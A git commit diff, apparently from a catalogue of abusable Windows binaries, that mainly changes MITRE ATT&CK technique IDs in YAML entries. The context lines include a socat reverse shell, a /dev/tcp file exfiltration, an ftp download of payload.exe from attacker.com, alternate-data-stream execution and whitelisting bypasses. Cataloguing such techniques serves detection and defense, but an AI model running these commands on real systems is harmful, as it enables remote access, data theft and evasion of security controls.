More changes (mainly changing some T1218 instances to T1202)

This commit is contained in:
Wietze 2021-11-05 20:17:04 +00:00
parent 2577066af9
commit bc51cb4e03
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
10 changed files with 19 additions and 19 deletions

View File

@ -9,28 +9,28 @@ Commands:
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows 10
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows 10
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\bash.exe

View File

@ -16,7 +16,7 @@ Commands:
Usecase: Use diskshadow to bypass defensive counter measures
Category: Execute
Privileges: User
MitreID: T1003
MitreID: T1202
OperatingSystem: Windows server
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows 10 (Tested)
Full_Path:
- Path: C:\Windows\explorer.exe

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Use forfiles to start a new process to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download

View File

@ -9,14 +9,14 @@ Commands:
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1216
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1216
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\gpscript.exe

View File

@ -16,7 +16,7 @@ Commands:
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
MitreID: T1216
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\hh.exe

View File

@ -9,21 +9,21 @@ Commands:
Usecase: Proxy execution of binary
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\pcalua.exe

View File

@ -9,10 +9,10 @@ Commands:
Usecase: Execute binary through proxy binary to evade defensive counter measurments
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmde from remote server
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
Category: Execute
Privileges: User

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1216
MitreID: T1216.001
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs